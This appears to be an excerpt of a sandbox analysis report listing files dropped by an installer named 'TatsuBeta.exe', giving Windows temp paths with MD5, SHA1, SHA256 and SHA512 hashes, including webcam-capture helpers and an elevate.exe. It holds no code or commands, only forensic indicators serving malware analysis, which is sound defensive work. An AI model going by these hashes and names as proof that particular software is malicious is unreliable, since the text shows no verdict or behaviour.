SHA1 89a8a126c0bbf536ac58e29fc50e045fb1b88220
SHA256 f5cf34ce58b7f0d450936981aa7ffa060821403e6768eee3746ea4ffc9193986
SHA512 6607eb2329b81f1eaf0ed3a564eddcb30e6ab59229f2fbf6fd3d2140ffaa8853a330eda627a4458ef6bb06f32c5183edda869e34cd4ead1f87f88d5c622c1a16

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\fil.pak

MD5 40bddaf97f64dfea9ebafc7f82166f80
SHA1 90d1fde3c0b27d2184f0353991259c2a92c7820c
SHA256 39a9d63736e7b4593fc6873ed3c19d45fbf9eb78a012bfdcee0fea5906ebc5b2
SHA512 d1e61c53e09a0dc50edf5aba5cf286a251ee88421aa2cd49332b70a5859646605ecb7d0bb97ea7242d14a18742e23da0a14c04b0b99b57a466ec87f4f66b897e

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\fi.pak

MD5 cc592d91ce8eabaa75249cb78b889376
SHA1 f2f0f7f105a17f3e4b1a97ed0e3c2e871c2c3eac
SHA256 b1cb0b32efa78fd8634652c74f298f1d5127f2363ef601cf000417e5c7fefd20
SHA512 58e2eaffe26d8fda8df43e7ebef449cfff1065e940c128efa0276511e34e96e52da9230f294b01d4ecd8ef606b792d372bff897d6d8bb67c31379418ce867d48

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\fa.pak

MD5 6458a239e994d8d18315deccd35389ed
SHA1 75c985f43503a6c44645786d46639a6b555ae163
SHA256 300fc1c735e92917a5ddf92feb812cbf3175d988ec7ad5955110248a1addbd34
SHA512 3062075b6be0c25c957ac88e537880bc25ff86b8ef0703a05209e9676e943e89476b7997394aeb25064e03a93be614fef535676e9cdfaf44b46035225b1b2cf5

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\et.pak

MD5 c76db3385190c6840315c4497e40258a
SHA1 34f1aef2ba2925bebc5dcdb70e5b6c1a138a5c46
SHA256 e8af084ef5e1062c5966dd7802074ac24f3672dc3c9b9c5453a397644727191f
SHA512 90a870369d307758b33d74e6213676d65c2d332f42577c8aff23d96b512f3c2a2bdace8d6d9007f88b9175eadc6f2ae28b498b1265550849ff9317465a37ad29

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\locales\hi.pak

MD5 590e9e73df9cbd83cd87b9c03848fec9
SHA1 da125e60a5a2c51a2d6219d3f81688bd22237b59
SHA256 089b9dd31090a987515809a68d26f6eeb64cd9283934e3dcc48b151eec7d3ad9
SHA512 fd0e5d0f2063e12b711275f390428b88f98ffaf6043cdb14b13674ac1e4aa9f70ae820ae960132d7155daf9b1308238775c4702694ab53068cdc709c50f9186a

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\es.pak

MD5 f83d8f7f6108786c02c2edbf3d85f147
SHA1 57781d9d9eb7c90cdc71f78e25d0763045b6d29a
SHA256 5b929216ac823dbe2b0bb98e64db76519900e09a86c8513019325271c66ade0d
SHA512 12747a4a61cdd21cad6e3f768cb43b8bda5ec9de373337c191b6994b20acd676c9d0a6cde8410a1e18f35dd5d2d332ea1bb7e7f8f6fc4b73d8774559e33398f1

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\id.pak

MD5 e40cb2f3b4db379e4d187aeef0dfd300
SHA1 537b1ebc615c980c89bbe2b9e91a11199fa7d6a6
SHA256 3339ef011c9bb64868da94adb25f4490acbc7f893e4337dbfe2797754cd659f5
SHA512 b87464460077aa55feb92eca8ed23d9a61829378bae7890c8a95dac5fcd735b145d65661f27facfe2586fcaa169692b00d8ee8dd505dc44bff7f7fd090f3e96c

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\hu.pak

MD5 71d42cb22d2d7a8b26c4514ab12df3aa
SHA1 cd0307503a7906f1742d1e98fc816959319c2171
SHA256 b51bcb888dbc27bab88a8c9d081df7496de8a9a5a4cd2cfe08abc154190e75e6
SHA512 29c67391bca706807be3a0cc79fe481f220e30263957a9c2485f0a4c498a5b250bdd83b5f4fad8d0b19c8a9a07d5650b5ebd5816b6aae311a1cde78a89303244

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\hr.pak

MD5 6f92235e6ba003af925a2d6584afd27d
SHA1 3ceba61e9c2975466b6244188f5ea72aaf042fc7
SHA256 479dc4f75a889d45f62b4ddb6eb48f21c473e37875468c9c26d928a263e15840
SHA512 82f2642dff4400704c15c2fa02d0ec74ed3fe888dc835447c1afce7463dee8f480bb81be358c306e681625864a6d25e5cd6c96252b8a56e6fc62014b3aa4d26a

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\kn.pak

MD5 5115cde84b4c674db412619b65433004
SHA1 164f33e7e2e9f685a579da492a6fc8806beb6cbf
SHA256 891e092c6895e23be986c3e6d39dcea9b6b75f1448239c13fd406680e50407a7
SHA512 090a247898cb533325d2b289a6cbd8db2a755ef0abab49d82f333e57b290c50b5996b81f15d8adc30160b216eebed3a1476aec1627195e52189557c1d48b0216

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\ko.pak

MD5 d6e2c18c9eabba59b50d147d942125ea
SHA1 0918879203c2050b4f9f449f5616e430897ba0b9
SHA256 f3581cea2e5b022b121010ffc5d67f86f717e3a0c0402abd81e24c87fd135b76
SHA512 f605f7b9893166778af156f9eb76eaa1209e7432450899540cd462ce0ffa69caf6f570b910cdd6d7bef54354379e9892a658e711baa93241da33755c107da859

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\ja.pak

MD5 833e8c4aa70351b6be7bd403e4e9a0a7
SHA1 46ccdbdea35deec8ef13a5fc833776875fad187b
SHA256 74422db1a5f28522f9a8b31a3bee9a6df794b419bf723cb6a6c88e82eb72cec0
SHA512 e8e709612a5ea81d2822e0025b7306f38571f2cec2ca72ac5a8ab852a0e36a0f5bc7e00d0baf7ac7becc2c54dda3a17c52ec1cd67ce12b14d91b6ae0b726d556

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\it.pak

MD5 5aa225aad4f9fe6d05ec24905a827d88
SHA1 f6d5ed337bd8e9cc3b962d3a498e3430fbf6de22
SHA256 96e02ab6937a1f1cb58762159761a737ce0e1dcd6a253554392baf4389326eab
SHA512 3fa928f19bdf65b8fbb274b478a801821b15c01224c113a8d7f6121a077b432c0cc84eefd9028a76adea9fa4bb65dcb868edfbd4368b1e4d477c49e187e4288a

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\lv.pak

MD5 264c6e20b3088ceb4dae5773cef0cb55
SHA1 fb6ff83ff14df008092bc3ee73bda7491e8e090e
SHA256 a676a781c1a587eadf23e5c69bc52f2d352346a70bc53ca908450362535eefda
SHA512 01e949f92e1e8599c581929a601d39640abaf1d907ce10102e591c3d490dd3874c679c75bb51308ead55a3bd0c6dcd1b8d4b2daf98ce1cf1c6bab42946e8b1e8

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\lt.pak

MD5 2d4fca437a7548893dc4b51fa5b33c33
SHA1 c1493013d7d981ea9223716e415380992de65c2f
SHA256 776dba792df7b444e1b720326312d8b8312cade74a1372c49456d932b7c65769
SHA512 b6a55ee1deff48d717a3e9399aef3c45eeec810cc5b5709fa3e9f56850115a5b02e02b7959ec77a6797e68516ee9372bacd260e62ac0d55a8e4c1c27af782b42

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\mr.pak

MD5 f22c99fe6a838e333e8ee06a4d01296b
SHA1 c3542ea8dd45a2b387dd02fa5687948f135e10f2
SHA256 b03a3042f907aed13253ae8083d08f5fad59ff438d024b097276856e72526911
SHA512 882022c2cb985d85f96d52c9bcfeeb089d6ff30e66187ccf424ef622092b9d359a51bdef1fb6ac3b9d3409aa79d37ca737ba7f3ed8b9cdaabfe04d90a7c8bc15

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\ml.pak

MD5 04b2540c25990a5e0a9b227dcce6ae0d
SHA1 4f8ccd154f54dfb083d4d1a3ed0994842c8ab13e
SHA256 556165b8b54c6e21bc66d12b3f5be393136714467c427f7114f314d18ad3c661
SHA512 4cab47e42e8f5d4a83851871f97f3e1360c993ba530dbb4b4b736350779784bd83189e1195d3480ce87298bb8f9b7f249fefa7764d850e5b0002895609626785

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\nl.pak

MD5 cf6b1cbfd669e9461553974ba37a475e
SHA1 b33867e9bc7fd88ca98a76dc4bd756bcf18887aa
SHA256 9a83ad866ad7fd9d65ecbc1e95c276cfce27e8257c76a16950fd14971e66b864
SHA512 e463029bb37f6bb3ff5cb6281f64291ada1b785fa33137e7aedfc7b5e409e99c75a91e7cf9b6c0933e970f70c14861190de66fc5d68925b687a6f5da02e21077

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\nb.pak

MD5 b61e42f66d581b6a8929cdf5fb10662e
SHA1 6f06fa9ee092fbcb61bbd668734fb3b92cfb549a
SHA256 1b17dcde8fc7308d926fbe0faa83dfc9ffe2efc5715e9afd557dde839ad98b7e
SHA512 79b82346c3f133a6ba44148a8432ad4e08e2805187b759509cb386bc800fd20215592c07d953812c243f0b1d5e1354245f2cb42b2b3eb6c87280bcb4008dbe97

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\ms.pak

MD5 6cfadaa784e687e6dadbcd80e631bc9b
SHA1 481acb75f525055bf4e45ecabe0eadcb9c492106
SHA256 fb5e125dd5e1f21e8df229d22cb3d1f9078bd79bbddca352899248f2a8b21b71
SHA512 0d7da5a90fe9372bc704ab8cdc8cbfb14d323cafdef856987e2d9e34d980196c03985e25099f5d1bcb10c97f040f4766e2c3713718649bb3f43914a77f0dbb39

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\ru.pak

MD5 75457b95d2bb03891232dae7db886387
SHA1 e5a7569df7f91533703626d167ecc8cddbd27205
SHA256 e0894d3aa3f8e0f8ac457a3300001d4e1dcf95980712f8c8e9c845eb4c2bbfa6
SHA512 9813239cb162cec24cb81cffdae2df06889782813d917da186ae40df6dae64477467e4b32ead2d714bc1de671538d4c1fde990d83d3ee69e0932f17226687a78

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\sk.pak

MD5 b35daa0bd9627ca88b413a5af7c6b4a4
SHA1 d5efdcbc7ca17de29f3075f6434f31ab2e895826
SHA256 f47bc1f7f5ab64681d0b152e1a019da60f0ef057ee8bf2ccede019dc4030c177
SHA512 48abb6ca2290820db2898b05820bb25e70fb1292c816eb0c8f17b3c5452de9fff7027d216d2bf413900f408f44ed4ac99151b28142a212c5cff8dfe229e87b9b

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\ro.pak

MD5 24b01a438a3ab9699d4ca97c081b5e82
SHA1 0d0b082544d23425a74199fb0a6c11192f0bdf7d
SHA256 38290b1c9712296d82ea1681ef95544a1eef4872289134b11e50af735e6deaca
SHA512 43199772312156f4633c4202499cde8f808e5e632c2013ec1129acee01a3f184e86df2616626173178efe04b6f0773ad9a0e8b8cc6a735d23d68dcfe9dfd945b

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\pt-PT.pak

MD5 ecd84b296d3bb312ee18e21017311986
SHA1 f5625523f85c10723750834a54ff59a2dd886fb3
SHA256 fcfaa9c44c445876c286388b6a1abc1df949f3dda3d64fb57d6e0d54a05cdb94
SHA512 e95b74238220024cdd0bd1c0f18beadbbe427d76cd8d6b32d5700adcd34ffb068ad0bf75404921485c8077f395f5111cd40d5dfe2b5b8f34c62e6fc80b507456

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\pt-BR.pak

MD5 88ad860c73676ffb4025b5c691f29942
SHA1 3c5e5b999ea7153ccdd1b4cc7b6162de3456b558
SHA256 25f0bb0b0230d99a9064d52668636f3be85903bf27a68124d79a2fe93c30fe0e
SHA512 41589bb9ab1b8307f62ceb4e6493d7903731a3e63807e0044379c4acdda881c21839234f5f1b8ad1af732bfee6231c0556ce92e582505379ed949980185bb750

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\pl.pak

MD5 644c0ace25d6e532b56510a736c6bc2c
SHA1 1bd0fec952107b493da04c46423da634ff3e1504
SHA256 2ff9e382a31783285b7d85676e629e2f6db26bb9536ed17b7fbe5ac61a895ec7
SHA512 9a1f1e884c2f214b8b0c63543809ddd4ba0fd533f1d8434e926051f3db434f60cc4df2462c2a43254b2a9685b3869eef49463c212892e417c82c3a7b497e3559

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\sl.pak

MD5 e015b6f5042be2dc96a4e23dcf035502
SHA1 7946509eed8db1e4c1f3da99ffe7155c86fdb4d6
SHA256 99536d1bc73eec81d5bebbff641ea195544ee5e3a41bb17ddcedf9cde9b141d4
SHA512 b2a2eaae93c506a053862bf1cde02eee53b3ea2e2fe4c964c51dbacb8b44de820a779311cfe01458e2f08f88bce1172e8c5e1e6d28cd3a355ff84baa00023b8f

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\sr.pak

MD5 af7083f2a4bd95dcbe792efade352662
SHA1 dc69aa831836016f6e66c6079931503d534a7862
SHA256 e3b80d9fdd420a05d66cc12e685ac94500106dd51a555bbfa2d085094f81e8dd
SHA512 342400ba94f6cd08152f96aa2b905184fab429c38cedb4bcb4ac0c503169a9ecd47aef208b4d7ffae08b0c0afa7aa089347a20739379d05f3e4e111be842b8c4

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\th.pak

MD5 43edd25f67ce6e6cea5373009ff0a1f8
SHA1 ed72ca6620cf23837e1334be50ccf616806bc5a2
SHA256 287897cf3df2db1cf59b872e6575ba8dfcaa0c1f68c17a9c91da6c4490adb8b0
SHA512 7160a72bd2e6b0ffa71e5d279995cc8be24a87cd9386eb29ab0eee79b8e607f5d824a11b6b4e3ef4c0f851a9d485a9642cb6adaa65c07933dca6e6f2c0052fc7

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\te.pak

MD5 793a87d41cde6e6d1bb086284f69733b
SHA1 d887e3842b664f55b7308427aa6f5bf0b352d879
SHA256 5cdabd1ad41e8048f2cc6b1615e68b99159daa1aa6706b939447c1811bf0e255
SHA512 7c2e53baa387480eed45315bd9d53856ca46e5777ecdc9c29a0de7b0ad04beb6cbb8b5df0aa7c306395fda563037e06bea1ca70e433ce5a3ccc2ec184dfda972

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\ta.pak

MD5 31dada843d0b4f9a66b184cb6d7b8b92
SHA1 0320b31981043c6e4c17470bf2ff4c7488553511
SHA256 457070b35c813175f5a7b630478073e478ff2bf23915dd3dc7a5b3b339cc2b0b
SHA512 c5b6ea595d3154fd9fe03f49a19f78eb4068718ce005b18a165d491459a290c29956b02a109ce2c314746773760c8e5c0d7064f384c65a572c78109f03538860

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\tr.pak

MD5 40491896ad21543f339467186c5efb40
SHA1 695dde7cc35056dcbf0a533aff8299d4c6b61bd8
SHA256 43e99e132acaba88971b81a43531845dc7fc3a1e0794c3373de7d9a50a5655aa
SHA512 18d5ee9914849462e0b1bafd1ca216b29d0795e282ae0bdb354b15caf5c18f37f44fbd6f626b2cbb095e3398a6496de72e5b0d15621433979b5a589e34fac818

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\sw.pak

MD5 99e385ebc1ef8d3daddb3a171fa79edf
SHA1 3164804dfe9d9b5e891abafe92e5ba67d2b5d4d1
SHA256 8ec45ac391a085d531fb21815086c2da4841aa016653cb4f8484cfc2615d6c01
SHA512 797c105fecef1e15870aa101e3fa1835d5a467a9059c03b3636c54934d1de263ab7f23599e21d9787cb3849c7cb7d29f5bdd8ae9ad10fda8015c1392462e94c0

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\sv.pak

MD5 41e76f7775fc9a2d6e3c02c46e9b32f6
SHA1 088c15c74a68bee69682bf89c31055332b68c84a
SHA256 2533676479e9469ffcdaabcb47d3e39bebfe7ae2b80f70784e918a8827439e13
SHA512 6cde752d748c4772b533c8894f18134e5842113f8c7590b44a7dfa088aed65b232361fd16170df3b0d738066dbc3a769847adf4dd8ba42de63c9c2b33f9beb6b

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\zh-TW.pak

MD5 c2c35fcedc3708b5bcadf36587393002
SHA1 31d72402cbd44ceb921cedd806259c2cd14e411f
SHA256 cfe4c2c5eb131fd92e0d11f912714c5a9a048833ef3ffbe32679b3d58da8f8ac
SHA512 9ba3ea2d569d1d3ef09e94d7e66f843c8804368c4d016b6289e7dba002f7d2d50884a76c93eef879d87abcf8b36dd3e682b7bd3a18b2b5a969256cef672abf01

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\zh-CN.pak

MD5 098d656a4f4bd8240bed10e7678186c7
SHA1 0c19ab62b4262f1b51558e8aaa79e7741f73393a
SHA256 a55f568ad3a8854cec25699484f55024501c8a0967738ba694e073151e5981c7
SHA512 084538ce774233ca6d4393bb42239b0b85e11bd73dd19ba47e55796ca19848941b037510c0fca4ac08b4b2e0ccbc9b4ae72ef88a3e841738dd211961dc53c1e2

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\vi.pak

MD5 69c8796439192577f48bd249175aaf37
SHA1 97c52088ca69dada593db0e42b2135d264646454
SHA256 d7fdb53592de803a5fbcd8561c4918f1562f92fc8a3fd0039a2a1a7b76a8ecc2
SHA512 65eb7cb15291474ec7f9354775e59bcf334c90ddf3498ebd184e4c47118308421b2405bfa679e4b3a70ed1790e167c109fc2c72e89c3e31b5378cae975424144

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\locales\uk.pak

MD5 d791b1ecf2931b2fb0c31aac170c7cdc
SHA1 02be115a9ff94fe5250651b6de4323eafc44fce1
SHA256 ffae6286d44c8e219ef90d411ad8746159a6ff8ea610e2a651147a3956696a22
SHA512 3a2edb8069e4a9734ce5e02b7c3de3c968c5bbc116f17f52f97e2bb2c78485c456c4f0cc952686c1aa17b7ee4d326a1dda698afafc63c79d842ca3905181a8da

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\resources\app.asar

MD5 4f6ced845e52f6228584061b4b117080
SHA1 deb0e7f18eb68ea02c82705efa988ac81c682469
SHA256 92d432ec3cc868672d630a4b1e6709aada637ae53941c1b76d77a805e44051ce
SHA512 bc8435ea7fa92c486c5f193592fd573c23eea062e0239fc81d8288dbc3f9ed73b5740b75972b91b39ca05b14bb65c409eb9615dc82e58829380d8ef8391593a4

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\resources\elevate.exe

MD5 792b92c8ad13c46f27c7ced0810694df
SHA1 d8d449b92de20a57df722df46435ba4553ecc802
SHA256 9b1fbf0c11c520ae714af8aa9af12cfd48503eedecd7398d8992ee94d1b4dc37
SHA512 6c247254dc18ed81213a978cce2e321d6692848c64307097d2c43432a42f4f4f6d3cf22fb92610dfa8b7b16a5f1d94e9017cf64f88f2d08e79c0fe71a9121e40

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\package.json

MD5 067e233b0609d56ff4756bedd8c0efe0
SHA1 96419d05adc4b6674948b4ac14f8ab5bb3ce4380
SHA256 6bee642c1b5de99e4edba87ec3221c2ecd10b65e666b6f2bef64a745538ecf74
SHA512 94900f5ff762930b1b060ba4dd44d629d6c3e2dfc0dacb1a543f1ea5a3cd40e793acaff4abefbff588ceb422d65f8041ec190a2b56f7c303c3314eb16eca4159

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\snapshot.exe

MD5 16a12bdc986207390dd79d658a6b2263
SHA1 b4b41f62cbc1e1ede786c6e30e11df8e61750bad
SHA256 50a8dd2f292bea9190204a42de067a34d5cbbec53746d40fe5b067fc85190bac
SHA512 d20394028c5d3ca46bb4879cac40da07b7d857f9a4a834bb4db4bd047f1a3265a80e1f7528244da6ee97c2f3e0cb5b2e51bc88eeb382a027939c2188e66dcdd9

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\swiftshader\libGLESv2.dll

MD5 ad5e31677cf993c3a04ca92e428cc0b7
SHA1 78fdb523496ad6ec24cf7d7e36b7074aca3e8e9c
SHA256 6a5e9f09277043628171cf95221cfb3916fc0d979bac4be8a41ab5da4a66b31e
SHA512 8eae4aa1ef0b4c9a6ceb9830eea079d6cfc49af9e36aecc77659343fea78823dcf63caec79498a3caefbbff5fd56b17fb2a351781ff557f019ad7c445a6a90d9

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\swiftshader\libEGL.dll

MD5 19dc9ee70e7765bb63a66b6826e8ecb7
SHA1 1a12f983f8b35cc2955d30657971f113c47dc164
SHA256 83d5719abee35e051d984510e1d5d9317a109031698814742b59bdbbe7d4e30f
SHA512 1fda2bcc4b2e70987ca6011ab2534007ae4f752016d29a588aaae839bb25c35e03773f220b6a8e926cf2643997e7d4c0f28743304269b2c55642ce12934def68

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe

MD5 471b15abc9f2e98fb7ed7361d3f045eb
SHA1 95b5798d80a9410872f6ed485ae2b43ca3745540
SHA256 7c262639cb22348dfd627dc07c76e8748e5bcacde2dcf1614773ab174c831004
SHA512 5b3b59aa1dbaef31b0ff6ccde082d7c312e39e311a46fe20d590d5d7765f934d3b663da9609ff4fb7beba2e8fa85376cf74f14ae077f3c0b49189cc28c30163a

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\DirectShowLib-2005.dll

MD5 c20c205c6f8d70a5e1351a4041a3ec9f
SHA1 e1b2a763dd6c42439656e4e55aba0f3610ff3784
SHA256 bbcbb170242d9ff1b56680a80b1f8755df1135f9c714535ff3b3f575442f38dc
SHA512 dffd59d775dbb89cd886a2212fb9fe4cf0b2bdd7f2c00f8dc7c6b2287053b4971c8c6c033109ff1f90cdacea082e44d3c19fa76325d24976420c418218e701f1

C:\Users\Admin\AppData\Local\Temp\nsc2372.tmp\StdUtils.dll

MD5 c6a6e03f77c313b267498515488c5740
SHA1 3d49fc2784b9450962ed6b82b46e9c3c957d7c15
SHA256 b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e
SHA512 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 0f29de40ee029fdeffea4bd1cae7cb50
SHA1 5bba9b60892c1729c6f995f9bd5f34c64f11a59e
SHA256 4778cb5f9b38e3a67a95c767426ac364ca16ae88032d3d1dd228e4e4b556771f
SHA512 809a891e5288db5745641b74b8144d6ff8ed6a769945753357479079c29aa13d6bf79c29adcb46978002fea714da13ebb3a81c50df514c6816a757a43666b7c7

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 8ce82300e907b0127165b70d8e8a094f
SHA1 5075e2e53af50bf0b91ef899abffb405d95d48f3
SHA256 d5440b4ff3201193e8167dcd8ec4ca462d446eef1efaf12fc2ee9319c87b45a3
SHA512 3d849215f73b4cb43751c74aee472b8a78b8715fcae712f21d0898489a70cc8605a51b525013d582e3f39c197eae4730a0d4daaf9b931a1b881843454e2244f9

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 7d5744767e8dd1acb9757848ed886448
SHA1 77a4ff0dfa0d604bc5f83180c53cae0a6fff486f
SHA256 078c006aad82c4dc861b86acf3f75ce69e3c18b72a62ad1382ea82c5ebd3c9b3
SHA512 8b9fa1c1c9472a12b4ade9404ffba83e35ba2ebb3987ccd880d92a7603ca96c6ecef91206bee51cda3b1039b412589f499fe9fcb0298e3b2422fdc909764cdfa

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\icudtl.dat

MD5 5183f4e34265dfd82ac3c1accdd87384
SHA1 5324d714ec5b66d9cc439e5c3e5e8f55f45113c5
SHA256 ce19fe681daa75bcbd3a3210c46dfb5795c87a155e4bb733968c548729108df1
SHA512 a3af9b2f005a20558f7c9a59841d9e68bd31576e56df0dca0a79e3f799f233b86e74d0923eab88ff2230f68f997b02d008e9e19bc28779997933b511e618880f

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\resources\app.asar

MD5 00f13de83ed2a4324190eec3ea3c31ae
SHA1 6f8b09af3f134b9d9b09bbcdbd65f15a1c72fab3
SHA256 455e87a2e71c1329eb48c76221820d15456d99aeed73868f30ed0248e2bb9201
SHA512 24153921a26cd5619cef89d5c85aefef073c62820b1b357b04531963ec4da441fa193b612856119f972df6b2be9fe8a6be4a71580cde8c8087833e64708e6cd4

C:\Users\Admin\AppData\Local\Temp\be55d65b-5c4e-4b65-86e7-e06483ea0285.tmp.node

MD5 3072b68e3c226aff39e6782d025f25a8
SHA1 cf559196d74fa490ac8ce192db222c9f5c5a006a
SHA256 7fb52b781709b065c240b6b81394be6e72e53fe11d7c8e0f7b49dd417eb78a01
SHA512 61ebc72c20195e99244d95af1ab44fa06201a1aee2b5da04490fdc4312e8324a40b0e15a7b42fab5179753d767c1d08ae1a7a56ac71a6e100e63f83db849ee61

C:\Users\Admin\AppData\Local\Temp\0c56eb2c-02cf-4a81-91a3-60190b8313ad.tmp.node

MD5 5317f23583ba935be25a4c26b3f93828
SHA1 bdc288a0576a9ca04295c2df6f71e260ae5097bc
SHA256 41db88f72dbc4ace9b4e6522b19f60e012980345fcb737cab1839ab0bb2f2cb3
SHA512 e3975f92f6bbd814cec4b6762b7f7475168dd43a717031de0d8055b7f5e4ce01dd011557c1301f9f9084f8a39248630c12f265a195c54c81f1efad9dd5bd91d0

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\resources.pak

MD5 e95dc6317348422e4bb14165d7e8ce82
SHA1 39e582d81ead24ce65375df1eba3e703613e7664
SHA256 83d7b9fefa3063d7d620f87228123efb98acadd545a5839b83b64e5f1e032a47
SHA512 122fb38975af5ea211dc042987a6d3d0895e5fafa7f27970fdea1b4eb6c6b5e8c4d252bd16433f97d7cdeb6179b34e0abc45da7711ee43e3edb885a697b6a2e1

memory/4492-578-0x00007FFB1B240000-0x00007FFB1B241000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 05236558845e37b632d7fe3b8ea37fc3
SHA1 8ec6ae33364fe1312a881e8fddcaa45ecfb03515
SHA256 28222f40b7d1d3a78db8b56164abd99dcb98dd780782751dc2e646022c0ddfd3
SHA512 1c3b05d495afee0daa5956539274cbf117e84d97a13c1862acb3b785b3deabcf32f2b61dfd05f93b10b552f38c35d3aabe7611487a237b2db27d048f996f1045

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 2e16765ba631c20064aad3327151511d
SHA1 910183ca36ccdcfe1fbe73d4c1d2d0931a827bef
SHA256 c576f927c6c802fd913d5c685a85cc04a7a3f62a74a1b9b0085823bf890964d8
SHA512 895e47290ab8f04b4092b43136ec2bd5f599b011d633088f591073eb532f8100ef5f1dc43403bd709d6a3690dda6453374629a71145634dc8e5580bcd165cac9

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 412dfe18c114548075ae3c48c1c1d902
SHA1 8b315b032af3893b7b668affc6032c508a9d1dbb
SHA256 7098fc1fdc6e2957fbc58f6a72d5b6769562b82415ac76e376c9c8f43bc57d68
SHA512 4095b80e225051f9b4154c63def185f50d5451633bcf6bbb52c86f3e54ffc357693ff04929bfcc8d550a92b8e5e4dcdc9e1e82e42ce1d9ffbe5c26d65a286187

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libGLESv2.dll

MD5 af6bf49f93cba4f9163e868f0af5114d
SHA1 4265fe0ec49853c27359e43a3cf0a6b4b81b5b52
SHA256 e5ec88c57175ef40d27adcb4c16df6cea19a152a5d583a80d377e4e02e3c9c7b
SHA512 759d30eb60e79e884ac03bf6cc8544ae7fb768bd65f0b1337851481e7c614eda1fced7dcdb00c9e9d70de2ac6aad60da4d1536c4a681717b5ad7f426d9f6dc32

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libglesv2.dll

MD5 9369121d39ee9369c0ad98b0c68964a4
SHA1 fd80db8de854bd3e254d26aec2c96347625850f4
SHA256 79080528e0a15f0f1089808db730f3427bc8e51545ad30c910fd67f180175f8b
SHA512 c3ea8e73500d1221c7caefc06689b08cd760a0a8f9a01297841e96aaa4a9c1560551c3b7d3caf6db10ab2378f7f0f9f246239112a4b81c7acf3d7892b006e6cc

